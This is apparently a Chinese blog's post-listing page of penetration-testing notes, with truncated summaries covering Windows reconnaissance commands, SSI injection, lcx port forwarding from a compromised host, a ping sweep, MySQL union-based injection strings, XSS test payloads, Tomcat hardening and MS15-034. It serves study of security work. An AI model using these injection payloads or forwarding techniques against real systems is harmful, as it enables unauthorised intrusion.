会员
周边
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
seeker01
博客园
首页
新随笔
管理
2018年1月10日
渗透测试-本地信息收集
摘要: Windows本地信息收集: hostname或者echo %COMPUTERNAME% 获取主机名 systeminfo 获取系统信息 set 环境变量 ipconfig /all 主机IP地址DNS服务器 route print 路由表 tasklist /v 查看进程 net session
阅读全文
posted @ 2018-01-10 10:47 seeker01
阅读(208)
评论(0)
推荐(0)
2017年12月14日
SSI注入(server side includes injection 服务器端包含注入)
摘要: 0x01 什么是SSI和SSI注入 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的
阅读全文
posted @ 2017-12-14 17:22 seeker01
阅读(869)
评论(0)
推荐(0)
2017年12月11日
渗透测试-内网渗透笔记
摘要: 端口转发 一、lcx 的使用 1. 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave xxx.xxx.xxx.xxx 10001 127.0.0.1 3389 意思是把肉鸡的 3389 端口转发到 xxx.xxx.xxx.xxx
阅读全文
posted @ 2017-12-11 12:24 seeker01
阅读(322)
评论(0)
推荐(0)
2017年12月8日
渗透测试-内网渗透笔记
摘要: 内网无工具扫描 一条 cmd 命令解决: for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl" ping 整个 c 段,只输出有响应的主机。 % H" g% Q+ _6 q- P7 t 更变态的: 4 o4 g8
阅读全文
posted @ 2017-12-08 09:44 seeker01
阅读(314)
评论(0)
推荐(0)
渗透测试-信息搜集笔记
摘要: whois查询: http://tool.chinaz.com/ https://whois.aizhan.com/ https://x.threatbook.cn/ http://site.ip138.com/ 子域信息收集: https://phpinfo.me/domain/ 端口扫描: nm
阅读全文
posted @ 2017-12-08 09:21 seeker01
阅读(425)
评论(0)
推荐(0)
2017年12月5日
Mysql注入笔记
摘要: 1.基于字符型报错注入 报字段数: ' order by 3 --+ // “+” 代表空格 ' union select 1,2,3 --+ ' UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 FROM INFORMATION_SCHEMA.SCHEMATA
阅读全文
posted @ 2017-12-05 19:10 seeker01
阅读(224)
评论(0)
推荐(0)
2017年11月29日
XSS漏洞理解
摘要: 反射型XSS漏洞挖掘思路: 1、客户端提交的内容,服务器未进行处理,原封不动的返回客户端。 2、挖掘XSS漏洞必须找到服务器的输出位置。 反射型XSS Poc: alert()函数过滤: <script>alert('xss')</script> 弹窗函数 <script>confirm('xss'
阅读全文
posted @ 2017-11-29 16:20 seeker01
阅读(841)
评论(1)
推荐(0)
2017年9月27日
tomcat服务器配置及加固
摘要: 一、tomcat示例文件未删除 打开tomcat_home/webapps文件夹,默认存在docs和examples文件夹,建议删除docs和examples文件夹 二、tomcat管理后台(默认不允许登录) (1)如果不需要使用tomcat manager Tomcat 5.x: 默认通过http
阅读全文
posted @ 2017-09-27 21:50 seeker01
阅读(455)
评论(0)
推荐(0)
2017年9月23日
python3基础学习笔记
摘要: 解决python2中文乱码问题,python3不存在此问题 1、#coding=utf-8 2、#-*- coding:utf-8 -*- 查看python3中关键字 import keyword keyword.kwlist
阅读全文
posted @ 2017-09-23 14:12 seeker01
阅读(140)
评论(0)
推荐(0)
2017年8月6日
http.sys远程代码执行漏洞(MS15-034)
摘要: 0x01漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。
阅读全文
posted @ 2017-08-06 14:21 seeker01
阅读(1448)
评论(0)
推荐(0)
下一页
公告